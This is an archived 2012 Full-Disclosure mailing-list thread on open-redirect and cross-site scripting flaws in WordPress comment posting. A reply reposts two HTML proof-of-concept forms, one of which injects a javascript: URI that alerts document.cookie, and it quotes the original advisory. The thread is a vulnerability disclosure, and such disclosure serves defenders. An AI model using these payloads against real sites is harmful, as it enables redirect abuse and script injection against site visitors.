lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <57db066ca90c62c007d1ae9fea2be4ec@intern0t.net>
Date: Sat, 05 May 2012 09:54:02 -0400
From: InterN0T Advisories <advisories@...ern0t.net>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Re: IAA,
	Redirector and XSS vulnerabilities in WordPress

Hi List,

To stop MustLive's desperate act of trying to get visitors (and more
backlinks) to his website, I have for those that doesn't want to go to
there, just to see the PoC's but actually read them on this mailing list
like almost _every other_ Proof of Concept / exploit, made them available
below.

Contents of Wordpress Redirector:
<html>
<head>
<title>WordPress Redirector exploit (lol?) (C) 2012 MustLive.
[removed]</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-comments-post.php" method="post">
<input type="hidden" name="author" value="Test" />
<input type="hidden" name="email" value="test@...t.test" />
<input type="hidden" name="comment" value="Test" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="redirect_to" value="http://awebsite.tld" />
</form>
</body>
</html>
--------------------------------------

Contents of Wordpress XSS:
<html>
<head>
<title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-comments-post.php" method="post">
<input type="hidden" name="author" value="Test" />
<input type="hidden" name="email" value="test@...t.test" />
<input type="hidden" name="comment" value="Test21" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="redirect_to"
value="javascript:alert%28document.cookie%29//" />
</form>
</body>
</html>
--------------------------------------

I don't really have any comments about these "exploits".



Best regards,
Nemesis 3.0


On Sat, 5 May 2012 16:01:53 +0300, "MustLive"
<mustlive@...security.com.ua>
wrote:
> Hello list!
> 
> I want to warn you about security vulnerabilities in WordPress.
> 
> These are Insufficient Anti-automation, Redirector and Cross-Site
> Scripting 
> vulnerabilities.
> 
> -------------------------
> Affected products:
> -------------------------
> 
> Vulnerable are WordPress 2.0 - 3.3.1.
> 
> ----------
> Details:
> ----------
> 
> Already from WP 2.0 there are Insufficient Anti-automation, Redirector
and 
> XSS vulnerabilities in wp-comments-post.php. With IAA I've faced just
when 
> begun using WP in 2006. If the developers fixed vulnerabilities in
> previous 
> two redirectors in WP 2.3, then these vulnerabilities were not fixed
even
> in 
> WP 3.3.1
> 
> IAA (WASC-21):
> 
> Lack of captcha in comment form allows to conduct automated attacks. The

> developers still haven't put captcha in WP comments form (from the first

> version of engine), which besides IAA attacks, also allowed to conduct 
> Redirector and XSS attacks.
> 
> By default in WordPress the premoderation is turned on, and also there
is 
> built-in anti-spam filter. But if 10 years ago the premoderation would
be 
> enough, then long ago this mechanism couldn't be considered as
sufficient 
> protection against spam, and anti-spam filter had efficiency less then
1%
> - 
> only few from spam messages he marked as spam. And also these mechanisms

> don't protect against below-mentioned attacks. Also plugin Akismet is 
> bundled with WP, which is "captcha-less" protection against spam. But by

> default it's turned off and comparing with captcha it's considered as
less 
> efficient and also doesn't protect against below-mentioned attacks.
> 
> Redirector (URL Redirector Abuse) (WASC-38):
> 
> Exploit:
> 
> [Removed]
> 
> XSS (WASC-08):
> 
> Exploit:
> 
> [Removed]
> 
> XSS attack is possible on different browsers, but it's harder to conduct

> then in case of previous two redirectors (via data URI). At IIS web
> servers 
> the redirect is going via Refresh header, and at other web servers - via

> Location header.
> 
> Due to nuances of work of this script (filtering of important symbols
and 
> adding of anchor), for execution of JS code it's needed to use tricky
> bypass 
> methods. This complexity exists as with javascript URI, as with combo 
> variant javascript URI + data URI.
> 
> Reliable captcha protects against IAA, Redirector and XSS
vulnerabilities.
> 
> ------------
> Timeline:
> ------------
> 
> 2012.04.26 - disclosed at my site 
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ